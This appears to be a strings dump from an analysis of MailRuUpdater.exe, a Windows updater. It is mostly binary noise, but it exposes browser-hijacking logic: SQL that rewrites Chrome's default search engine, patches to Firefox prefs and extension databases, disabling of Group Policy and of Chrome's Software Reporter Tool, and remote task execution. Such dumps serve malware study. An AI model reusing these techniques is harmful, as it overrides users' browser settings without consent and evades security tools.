.?AV?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AVconnection_data@downloader_impl@http@mailru@@
.?AVconnection_data_file@downloader_impl@http@mailru@@
.?AVconnection_data_string@downloader_impl@http@mailru@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@std@@
.?AV?$sp_counted_impl_p@Vdownload_limitation@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_file@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_string@downloader_impl@http@mailru@@@detail@boost@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
Inappropriate I/O control opera
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
< <$<(<,<
0 0$0(0,0
313C3O3a3m3r3
0%0s0
343f3
8:X:#;i;n;};
8(8&:5:_:
;";';&<5<[<
9%9U9u9
3?4X4
8œ9h9
:&:;:@:{:
4"414&585
0"0)00090
3%3s3
2/2x2c3}3
9$9(9,90949
878<8[8`8
77R7c7o7v7
5#6-676\6
8 8%8*888
? ?$?(?,?0?4?8?
8 8$8(8,8&9
2%3u3z3
9 9$9(9,9
5 5$5(5,50545~5
6$6,666<6
2"2(22282*323
2#20262=2^2
5"=)=2=9=
708}8!:(:
7 7-787@7_7
1 1$1(1,1
0'0-020@0
3#323@3#525@5
: :$:(:,:0:4:
5,5054585<5@5
3 3$3(3,3034383<3
5 5$5(5,50545
4 4$4(4,484<4
6 6$6(6,6064686<6
8 8$8(8,8084888<8
9(9,90949|9
=@>\>`>|>
< <$<0<@<
> >$>(>,>0>4>8><>
8 8$8(8,808
? ?$?(?,?0?4?8?<?
1 1$1(1,101
6 6$6(6,6064686<6@6
8 8$8(8,8084888<8@8
1 1$1(1,1014181<1@1
6 6$6(6,6
2$2,282\2|2
7,787@7`7
2,282\2|2
3 3(343\3
7,787\7|7
:,:8:@:`:
?(?4?<?\?
>$>,>8>\>|>
;(;4;<;\;
1$1,181`1
0 0(040\0
1 1(1,1|1
2 202@2`2
> >$>(>,>0>|>
praetorian.exe
qipguard.exe
BrowserManager.exe
BrowserManagerGUI.exe
QHActiveDefense.exe
QHSafeTray.exe.exe
QHWatchdog.exe
GuardMailRu.exe
JMail.Ru\Sputnik\Report
hXXp://xml.binupdate.mail.ru/audit_config.mrdj
Start new check operation
o failed to parse. New report Created
restore mail.ru for:
operation_type
checker->Check failed, msg =
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetched
FFExtensions/FFVbm/Url
Hp/Url
Dse/Url
Vbm/Url
Google\Chrome\User Data\Safe Browsing Extension Blacklist
Advapi32.dll
MGoogle/Chrome/User Data
Google/Chrome/Application
Software\Policies\Google\Chrome
hXXp://xml.binupdate.mail.ru/ext_storage.mrdj
Google Chrome
Google/Chrome/User Data/Default
Google/Chrome/Application/chrome.exe
Software/Google/Chrome/BLBeacon
URLS
manifest.json
sqlite3_reset
sqlite3_exec
Web Data
chrome.exe
select k.url from meta m, keywords k where m.key='Default Search Provider ID' and m.value=k.id
select id, short_name from keywords where url like '%go.mail.ru%' COLLATE NOCASE
No go.mail.ru in chromium
SELECT id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
DELETE FROM keywords WHERE short_name = '@MAIL.RU'
SELECT * FROM keywords
ALTER TABLE keywords ADD COLUMN alternate_urls VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN search_terms_replacement_key VARCHAR DEFAULT ''
INSERT INTO keywords
id, short_name, keyword, favicon_url, url, show_in_default_list, safe_for_autoreplace, originating_url, date_created, usage_count, input_encodings, suggest_url, prepopulate_id, created_by_policy, instant_url, last_modified, sync_guid
@Mail.Ru','go.mail.ru','hXXp://go.mail.ru/favicon.ico','hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg',1,1,'',1333701777,0,'windows-1251','hXXp://suggests.go.mail.ru/ff3?q={searchTerms}',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
UPDATE keywords SET short_name = '
@Mail.Ru', keyword = 'go.mail.ru', favicon_url = 'hXXp://go.mail.ru/favicon.ico', url = 'hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg%RFR%',show_in_default_list = '1' WHERE id = '%ID%'
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'go.mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id, prepopulate_id FROM keywords
' WHERE key = 'Default Search Provider ID'
' WHERE key = 'Default Search Provider ID Backup'
SELECT value FROM meta WHERE key = 'version'
UPDATE keywords SET suggest_url = '%SUGGEST_URL%' WHERE keyword like '%mail.ru%'
%SUGGEST_URL%
^(chrome-extension://)?(\w{32})?/?
Software/Google/Chrome/Extensions
Sync Data Backup/SyncData.sqlite3
hXXps://clients2.google.com/service/update2/crx
hXXp://xml.binupdate.mail.ru/guard/mrids.mrdj?
Extension from url installed
DefaultSearchProviderSearchURL
DefaultSearchProviderKeyword
&%1$=%2%
mmail.ru
VVV.mail.ru
VVV.go.mail.ru
common_process.exe
{27116687-8CD6-4A82-BA83-5099C3A885BF}
{A12C4AB1-F4D0-4771-8C21-613E9D12491F}
{1079004F-E4EF-4A44-9D1F-7C9CE09CE258}
{901B414B-72A2-48C6-8DCD-29388B8B3E40}
{0ED2394C-62B6-4A80-A342-C2CA0B2A4E82}
{E60E6A0E-4092-4965-85BB-AA1ED8EBBC8E}
{ADAC3638-040C-498C-845A-F89B99705444}
{4519D3B5-465C-4AE2-A905-960CA7D5385C}
{F581DE96-9AA1-45C8-8335-B7445525371A}
{DCEF19BB-AB61-48F4-A7CB-6D677D90D1C2}
{B63A6D16-4F50-47C2-9BF7-A5D6E79C9EFD}
{11A1974E-9BEF-4B50-8E2F-9F25FC775BD1}
{3E57F3FE-4397-4DEA-A19A-760BFCD24242}
{603A8599-628C-4F00-A940-A09F1583A23E}
{D33EDE61-8E43-4C1F-9371-6A240B4DA5C9}
{C74622AC-AC0B-44E5-BDC2-EE39A5FD9EC9}
{ABCAA0D8-A892-481F-9492-ACC63768F659}
{8DC7BF6A-58F3-4740-B600-34E37FFADC21}
{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}
{96AF929E-B8EB-499E-99A8-095E4262BE26}
{027940D4-10B8-43B6-9707-A4EE47618E1D}
{45DA0BF7-F31B-4360-BF9A-8E7374A78916}
{5552B451-2086-4B64-82C6-732B18E41FCD}
{F9CC112D-19A0-455B-8D85-F5E9CB7D5914}
{0E26AC42-4B6E-4C84-8291-A0CAC999E70D}
{CFB9F60E-912D-43B3-91C9-9E06AE17ADE0}
{3CE4F0C3-2143-491F-8F20-27792166C41F}
{66CD85E0-6D8E-444E-9D71-AED8BA171A26}
{4947360E-E26B-4CC9-BB40-F4A30EDCA39E}
{14737ADB-9F88-47E8-A76F-D365509795AC}
chrome-extension://clpdgmdkdnijjbgmnajolnbnjejoeogm/visual-bookmarks.html
chrome-extension://hcncjpganfocbfoenaemagjjopkkindp/visual-bookmarks.html
chrome-extension://jaocgokledfmfebefgbeokdodbbdjhdd/visual-bookmarks.html
chrome-extension://dhngkpgdbpbkopndlpkicfaiffphdkbo/visual-bookmarks.html
)Software\AppDataLow\Software\Mail.Ru\IE_Bar
Software\Mail.Ru\IE_Bar
Software/Mail.Ru/Updater
Software\Mail.Ru\Flags
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
SOFTWARE/Microsoft/Windows/CurrentVersion/Run
SOFTWARE/Mail.Ru
@Mail.Ru
{09900DE8-1DCA-443F-9243-26FF581438AF}
{58810E75-E249-44C6-B989-11D227263E24}
{91397D20-1446-11D4-8AF4-0040CA1127B6}
{95289393-33EA-4F8D-B952-483415B9C955}
hXXp://mrds.mail.ru/update/2/
hXXp://suggests.go.mail.ru/ie8?q={SearchTerms}
{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
Mail.Ru
iexplore.exe
{37964A3C-4EE8-47b1-8321-34DE2C39BA4D}
{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}
firefox.exe
opera.exe
SOFTWARE/Google/Chrome/Extensions
amigo.exe
nichrome.exe
browser.exe
Yandex.Browser.New
Software/Mail.Ru/ChromeInstaller
hXXp://xml.binupdate.mail.ru/guard/update/version.xml
F777C640-57F8-4ECE-A40B-F571D25C2EFE
.html
opera
launcher.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Google Chrome
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Bromium
Software/Microsoft/Windows/CurrentVersion/Uninstall/Xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/{1B89BC31-F539-4EBD-B94F-C24705C73433}
Software/Microsoft/Windows/CurrentVersion/Uninstall/YandexBrowser
xpom.exe
Software/Microsoft/Windows/CurrentVersion/Uninstall/xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/Amigo
google chrome
firefox
Microsoft/Windows/Start Menu
Microsoft/Windows/
tsearch-metadata.json
prefs.js
sessionstore.js
places.sqlite
cookies.sqlite
Mozilla\Firefox\profiles.ini
Mozilla\Firefox
Lsearch.json
Mozilla Firefox
mailru.xml
<SearchPlugin xmlns="hXXp://VVV.mozilla.org/2006/browser/search/" xmlns:os="hXXp://a9.com/-/spec/opensearch/1.1/">
@Mail.Ru</os:ShortName>
@Mail.Ru</os:Description>
<SearchForm>hXXp://VVV.mail.ru/</SearchForm>
<os:Url type="application/x-suggestions json" method="GET" template="hXXp://suggests.go.mail.ru/ff3?q={searchTerms}"></os:Url>
<os:Url type="text/html" method="GET" template="hXXp://go.mail.ru/search"><os:Param name="q" value="{searchTerms}"/>%PARAMS%%RFR%</os:Url>
extensions.ini
ini keys failed
extensions.json
extensions.json not parsed!
localstore.rdf
extensions.sqlite
PMail.Ru\Tmp\ffvisualbookmarks.7z
install.rdf
d.autoreg
extensions.rdf
extensions.cache
install_options.xml
@Mail.Ru
Mail.ru
Firefox
File: %s
SELECT last_visit_time FROM urls order by last_visit_time DESC LIMIT 1
couldn't create instance of IUrlHistoryStg2
EnumUrls failed
FaviconURLFallback
SuggestionsURL
ie.reg
[-HKEY_USERS\
import
reg.exe
*.dll
%1%version.txt?type=%2%&GUID=%3%&rfr=%4%
metric successfully send, url =
metric send failed, url =
Mail.Ru/Id
Software\Microsoft\Windows\CurrentVersion\Run
Software\Mail.ru\Tech\ptls
Software/Mail.Ru/Guard
R.delay
Mail.Ru/mrst
hXXp://xml.binupdate.mail.ru/tasks/shortcuts.mrdj?
url_argument
key_arg
^(http[s]?:\/\/)?(www\.)?([\w\.-] )([:\/].*)?$
Remote tasks execution started
hXXp://xml.binupdate.mail.ru/tasks.mrdj?
added task to executing task array
Software/Microsoft/Windows/CurrentVersion/Run
Syahoo.com
webalta.ru
yambler.net
yafinder.com
Found mail.ru extension of type
KhXXp://mailruupdater.cdnmail.ru/MailRuUpdater.exe
5Software\Mail.ru\Tech\ptls
SSoftware\Mail.Ru
Allow service process execute task
--uac-passed
mru_uac_passed
Guard@Mail\.ru
SwReporter
software_reporter_tool.log
Error parsing reporter logs:
dFailed to update SwReporter data:
since_last_exec
chrome
hXXp://xml.binupdate.mail.ru/tasks/ext_settings.mrdj?
Terminating update.exe
update.exe
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj?
\bmail\.ru\b
K{61EB20A4-D4D5-4276-A2C9-DCCE8CE9F633}
{A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
qip.ru
Start proceed Google Chrome
Google Chrome is done
Google Chrome is not done
Start proceed Firefox
Firefox is done
Firefox is not done
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj?
hXXp://go.mail.ru/?chverfix=1&fr=chverfix_sg
hXXp://go.mail.ru/search?q={SearchTerms}&ieverfix=1&fr=ieverfix_dse
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetching failed
Svk.com/audios
ok.ru/music
my.mail.ru/music
e.mail.ru/messages/inbox
vk.com/app
ok.ru/game
ok.ru/app
my.mail.ru/app
games.mail.ru
SELECT id, url, last_visit_time FROM urls where url like '%%%1%%%' order by last_visit_time DESC limit 1
SELECT url, last_visit_date FROM moz_places where url like '%%%1%%%' and guid != '' and guid notnull order by last_visit_date desc limit 1
\Toolbar\Custom\Packages\hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml\Components\smartbox
Yandex\Toolbar\state.json
yasearch-xb\plugins.json
Software\Mail.Ru\Updater
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
uac-passed
Kamigo_tmp.exe
hXXp://binupdate.mail.ru/amigo/version2.xml
internet_tmp.exe
hXXp://binupdate.mail.ru/chrome/version3.xml
internetupdater_tmp.exe
hXXp://binupdate.mail.ru/chrome/version2.xml
0.0.0.0
inttoam_tmp.exe
hXXp://binupdate.mail.ru/chrome/internet_to_amigo.xml
28.0.1501.430
hXXp://binupdate.mail.ru/updater/version.xml
mrutmp.exe
.mru_update_service
C:\logging
amsg
last_chrome
ovr_chrome
Google/Chrome/User Data/Default/History
hXXp://xml.binupdate.mail.ru/friends.mrdj
oUpdater.Mail.Ru
Mail.Ru Group
Updater.Mail.Ru exist
Updater.Mail.Ru: Error during coping file, rc =
Service::Update update operation is proceed
Updater.Mail.Ru: StartService: RegisterServiceCtrlHandler returned error
Updater.Mail.Ru: StartService: SetServiceStatus returned error
Updater.Mail.Ru: SERVICE_CONTROL_STOP
Updater.Mail.Ru: SERVICE_CONTROL_INTERROGATE
Updater.Mail.Ru: SERVICE_CONTROL_SHUTDOWN
%1% (%2%)
\StringFileInfo\xx
notepad.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
0123456789 ,.
Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
sqlite3_prepare16_v2
sqlite3_step
sqlite3
SQLite error %1% returned by %2%
SQLite error code %1%, file %2%
sAbsolutePath: <%s>
Incorrect firefox js file
stub.exe
hXXp://xml.binupdate.mail.ru/tenv.mrdj
filter.cfg
metrics.csv
http.csv
%Y%m%d
%Y-%m-%d
%H:%M:%S
%Y%m%dT%H%M%S%F%q
%Y-%m-%d %H:%M:%S%F%Q
%Y-%b-%d %H:%M:%S%F %z
%O:%M:%S%F
Invalid url
jMail.ru/ifrm
SOFTWARE/Mail.ru
Internet Explorer/iexplore.exe
Global\651CB287-2277-4F76-84C6-1D61E868304B
Mail.ru/CommonCache
HTTP code %1%
%Y-%b-%d
l%Y%m%d
SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
asio-58CCDC44-6264-4842-90C2-F3C545CB8AA7-%u-%p
hXXp://xml.binupdate.mail.ru/cache_policy.mrdj
rCachingPolicy/Urls
mscoree.dll
madvapi32.dll
skernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
888816666554443
6666554443
!6666554443
%5N.log
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe
Mail.Ru updater
1.17.0.150

MailRuUpdater.exe_3616:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
.EKSWU
DlSHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>
FtPS
FTPG
FTPj
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by <appro@openssl.org>
|$@3|$<3
Camellia for x86 by <appro@openssl.org>
RC4 for x86, CRYPTOGAMS by <appro@openssl.org>
<0|1<:}-
<0|9<:}5
w%s( 
8%u(j
uXj.hLj
ugj.hLj
gj.hdi
 FTPj
F\ FTP
<x%uY
><%uB
t.Jx 
;*u%C
Lj.hL
j.Yf;
_tcPVj@
.PjRW
f;F.se
?sqliu
 2 34 567
?%Y-%u
m-%du
?%H:%u
M:%Su
C:\desktop_apps\SputnikLib/log_ng.h
C:\desktop_apps\CommonFiles/url_params_common.hpp
mailru::url_params::formalize_common_params
mailru::url_params::AddWinVerInfo
mailru::url_params::AddChromeMetrics
mailru::url_params::AddToolVer
mailru::url_params::AddOtherProcessInfo
..\CommonFiles\audit\audit.cpp
..\CommonFiles\audit\audit_browsers_manager.cpp
c:\desktop_apps\commonfiles\audit\audit_browsers_manager.h
ReportTime
..\CommonFiles\audit\audit_browser_settings.cpp
mailru::AuditBrowserSettings::MakeReport
) report successfully done
Make report failed
mailru::AuditBrowserSettings::ScheduleReportCheck
mailru::AuditBrowserSettings::CollectReportInfo
mailru::AuditBrowserSettings::CheckReport
error report structer
..\CommonFiles\audit\audit_google_chrome.cpp
mailru::AuditGoogleChrome::CheckerHomepageCh::RestoreChild
mailru::AuditGoogleChrome::CheckerDefaultSearchCh::RestoreChild
mailru::AuditGoogleChrome::CheckerVbmCh::RestoreChild
:Incorrect key length
Unable to read chrome blocklist
Chrome blocklist file is not valid
chrome blocklist contains unsupported elements
..\CommonFiles\chrome-safe-browsing.cpp
mailru::chromium::ChromeSafeBrowsing::ReadSafeBrowsingFile
shard_header.add_prefix_count > kMaxAddSubChunksCount
Unable to open "%s" for writing
RegCreateKeyTransactedW
C:\desktop_apps\SputnikLib/reg_key.hpp
startup_urls
urls_to_restore_on_startup
..\commonfiles\chromiums.cpp
Chrome
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
KERNEL32.DLL
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
%%%%-%%%%-%%%%-%%%%
C:\desktop_apps\CommonFiles/sql_lite_bind.hpp
..\CommonFiles\chromium_settings.cpp
hXXp://mail.ru
hXXp://VVV.mail.ru
browser.show_home_button
session.restore_on_startup
yandex\.ru. clid
mailru::chromium::settings::search_url
chrome_settings_overrides
search_url
template_url_data
mailru::chromium::settings::search_url_without_extensions
@MAIL.RU
suggestions_url
suggestions_url_post_params
windows-1251
keyword
mail.ru
D15371FE-C188-4E99-9841-A91F3BCBCCC3
search_terms_replacement_key
search_url_post_params
favicon_url
hXXp://go.mail.ru/favicon.ico
image_url
image_url_post_params
instant_url
instant_url_post_params
originating_url
alternate_urls
default_search_provider_data.template_url_data
suggest_url
default_search_provider.name
default_search_provider.search_url
go.mail.ru
keystore_encryption_bootstrap_token
chrome_url_overrides
chrome-extension://
extensions.settings.
hXXp://mail.ru/cnt/9824
mail.ru
mailru::chromium::settings::url_from_ext_id
extensions.known_disabled
error %s
update_url
.enabled
hXXp://xml.binupdate.mail.ru/amigo/check_policy.amg?
check_policy.amg not loaded
check_policy.amg NOT decoded
check_policy.amg NOT parsed
mailru::chromium::settings::InstallExtensionFromUrlNoThrow
Disabling dse in GPO failed: %s
Looking for local GPO failed: %s
yasearch.native_comps.hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox.all.settings.searchName
hXXp://VVV.mail.ru/cnt/7861
hXXp://agent.mail.ru/ru/download/agent_windows/download.html?sputnik=1
hXXp://img.imgsmail.ru/r/agent/favicon.ico
hXXp://mail.ru/cnt/10445
hXXp://VVV.mail.ru/
hXXp://go.mail.ru/search?fr=ntg&q={SearchTerms}
hXXp://go.mail.ru/search?fr=ntg&q=
hXXp://m.mail.ru/cgi-bin/splash?opera=1
hXXp://VVV.mail.ru/cnt/5090
hXXp://go.mail.ru/search?q=%s&fr=ntg
@mail.ru
hXXp://suggests.go.mail.ru/ff3?q={SearchTerm}
hXXp://go.mail.ru/search_images?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_images.ico
hXXp://go.mail.ru/search_video?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_video.ico
hXXp://VVV.mail.ru/cnt/5091
hXXp://redir.opera.com/speeddials/mail.ru
hXXp://redir.opera.com/bookmarks/mail.ru
hXXp://go.mail.ru/search?q=%s&fr=opr11
hXXp://go.mail.ru/search?q={SearchTerms}&fr=ntg
hXXp://suggests.go.mail.ru/ff3?q={searchTerms}
hXXp://mail.ru/cnt/10226
hXXp://go.mail.ru/?pin=1
mailru::default_browser::find_executable
..\CommonFiles\default_browser.cpp
C:\desktop_apps\SputnikLib/com_scope.h
SHORTCUTS PROSEED ERROR: std exception = %s
..\commonfiles\file_util.cpp
C:\desktop_apps\3party\ticpp/ticpp.h
..\CommonFiles\firefox_settings.cpp
mailru::firefox::settings::~settings
browser.startup.homepage
Profile%d
hXXp://go.mail.ru
browser.search.selectedEngine
browser.search.defaultenginename
browser.search.defaulturl
keyword.URL
extensions.enabledAddons
mailru::firefox::settings::is_yandex_elements_intsalled
yasearch@yandex.ru
mailru::firefox::settings::remove_media_viewer
browser.search.suggest.enabled
browser.search.useDBForOrder
Firefox
..\CommonFiles\Firefox_visual_bookmarks.cpp
mailru::firefox::visual_bookmarks::install
mailru::firefox::visual_bookmarks::download
urn:mozilla:item:
mailru::firefox::visual_bookmarks::localstore_rdf
chrome://browser/content/browser.xul#mailru_main_toolbar
(\s*app-profile\s \{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s rel%\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s \d )\s*.*
partner_new_url
partner_online_url
hXXps://xtnmailru.cdnmail.ru/go_ffvbm1_update.rdf
chrome://vbmail.ru/skin/vb-logo.png
extensions.autoDisableScopes
extensions.shownSelectionUI
mailru::firefox::enable_visual_bookmarks::PatchExtensionSqlite
mailru::firefox::enable_visual_bookmarks::PatchExtensionIni
mailru::firefox::enable_visual_bookmarks::PatchExtensionJson
updateURL
updateKey
optionsURL
aboutURL
iconURL
icon64URL
Mail.Ru
homepageURL
hXXp://sputnik.mail.ru/
{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
mailru::firefox::enable_visual_bookmarks::is_enabled
mailru::firefox::enable_visual_bookmarks::PatchFileTime
..\CommonFiles\GPOManager.cpp
GetRegistryKey for machine failed
GetRegistryKey for user failed
?mailru::sqlite_bind::column_int64
search_id() = %s
HKEY_USERS ie search url = %s
HKEY_LOCAL_MACHINE ie search url = %s
..\CommonFiles\ie_settings.cpp
Disabling GPO restrictions failed: %s
mailru::reg_keyT<0>::check
ntdll.dll
kernel32.dll
..\CommonFiles\Install_stat.cpp
..\CommonFiles\savestate.cpp
web_data_ver
save_google_state_task::do_task error : item_in_storage.file_serialize
..\CommonFiles\shortcut_check.cpp
c:\desktop_apps\commonfiles\tasks\TaskShortcuts.h
..\CommonFiles\Tasks\RemoteTaskExecuter.cpp
mailru::RemoteTasksExecuter::InitTasks
mailru::RemoteTasksExecuter::ExecuteTask
mailru::RemoteTasksExecuter::FetchTasks
Fetching tasks.mrdj...
Fetching url =
google chrome sync_enabled
..\CommonFiles\Tasks\TaskEmulateWebStoreInstallation.cpp
ERROR google_blocked_mailru_extensions_base::ProceedExtensions std::exception %s !!!
..\CommonFiles\Tasks\TaskGoogleBlockedMailruSettings.cpp
ChromeVbmId
ChromeVbmArchive
..\CommonFiles\Tasks\TaskInstallUpdater.cpp
..\CommonFiles\Tasks\TaskInterface.cpp
..\CommonFiles\Tasks\TaskInstallUpdaterAsService.cpp
cmd_line =
..\CommonFiles\Tasks\TaskPeriodicDisableGPO.cpp
14000000000000000
..\CommonFiles\Tasks\TaskPreventSRT.cpp
mailru::TaskPreventSRT::SendReporterMetric
software_reporter
ReporterLogPattern
invalid map<K, T> key
ERROR: chrome_value is empty
..\CommonFiles\Tasks\TaskRemovePornExtensions.cpp
..\CommonFiles\Tasks\TaskRestoreFFDse.cpp
..\CommonFiles\Tasks\TaskStartGroupBlackList.cpp
mailru::TaskStartGroupBlackList::ProceedGoogleChrome
ProceedGoogleChrome patch prepared
ProceedGoogleChrome start patching
google_chrome object constructed
Google Chrome settings are synced
Google Chrome extensions are synced
TaskStartGroupBlackList::ProceedGoogleChrome failed, error =
ProceedGoogleChrome patch_util.set_was_patch(true);
mailru::TaskStartGroupBlackList::CleanUpChromeStartPages
mailru::TaskStartGroupBlackList::ProceedFirefox
ProceedFirefox is running
hXXp://go.mail.ru/?ffverfix=1&fr=ffverfix_sg
TaskStartGroupBlackList::ProceedGoogleChrome failed, er =
TaskStartGroupBlackList::ProceedGoogleChrome failed
hXXp://go.mail.ru/?ieverfix=1&fr=ieverfix_sg
..\CommonFiles\tasks\task_amigo_remove_pinned_tabs.cpp
..\CommonFiles\Tasks\task_change_sic_settings.cpp
..\CommonFiles\tasks\task_user_preferences.cpp
mailru::TaskUserPreferences::AnalyzeFirefox
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml
hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox
Error reading yandex plugin config: %s
Error changing yandex smartbar config: %s
Error disabling yandex smartbox plugin: %s
..\CommonFiles\yandex_elements.cpp
class Json::Value *__thiscall mailru::YandexElements::FindSettingInStateConfig(class Json::Value &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &,const class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > &) const
Error reading yandex config setting "%s": %s
browser.uiCustomization.state
Error enabling standard search panel: %s
guid_manager.cpp
installer.cpp
mailru::reg_keyT<0>::throw_on_error
main.cpp
Started with cmd line
c:\desktop_apps\mailruupdater\concrete_update_task.hpp
self_update_task.cpp
SendBrowsersStatistic.cpp
c:\desktop_apps\mailruupdater\SendBrowsersStatistic.h
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_amigo>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_mail>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_google>::getDSEurl
service.cpp
asio.misc
asio.misc error
C:\desktop_apps\3party\boost_1_56_0\boost/exception/detail/exception_ptr.hpp
update_info.cpp
fetch_url
Program fetch url
md5 fetch url
cmd_line
util.cpp
updater::Util::SaveChromeStateTask
SHA-256 part of OpenSSL 1.0.0g 18 Jan 2012
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
SHA1 part of OpenSSL 1.0.0g 18 Jan 2012
SHA-512 part of OpenSSL 1.0.0g 18 Jan 2012
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
RSA part of OpenSSL 1.0.0g 18 Jan 2012
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
